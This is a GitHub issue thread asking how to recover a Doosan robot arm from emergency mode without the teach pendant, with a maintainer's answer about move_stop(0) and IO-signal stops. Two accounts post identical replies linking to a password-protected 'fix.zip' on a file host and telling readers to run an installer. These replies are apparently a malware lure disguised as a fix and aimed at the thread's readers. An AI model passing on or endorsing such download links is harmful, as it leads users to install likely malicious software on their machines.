DoosanRobotics/doosan-robot2 #84: Emergency mode recovery without pendant

karim3000, 2024-08-26:
Hi all. I have purchased 2 Doosan manipulators and am attempting to program emergency recovery. Currently I'm only able to recover from a red status indicator by using the pendant. I would like to do it autonomously in python/C++ so that i can remove the pendant. Can you please provide a sample code for this functionality if it's available?

qlqw233, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

llowvxe, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

song-ms, 2024-09-26:
hi @karim3000 

I would like to respond to your inquiry. Currently, due to the API structure, there is command authority only for the single channel that is connected, so there is no way to provide an emergency stop during synchronous motion. However, if the robot is processing commands in asynchronous motion, you can create an emergency stop state using move_stop(0). Additionally, you can pre-configure an emergency stop signal on the IO signal, allowing you to send an emergency stop signal via the IO signal without using TP.

karim3000, 2024-09-26:
Hi @song-ms, thanks for your response. This will be helpful for emergency stop situations. However, I would like to also know how to unlock the emergency stop so the Doosan can continue operation when given a signal.

closed 2025-02-19 by doosan-robotics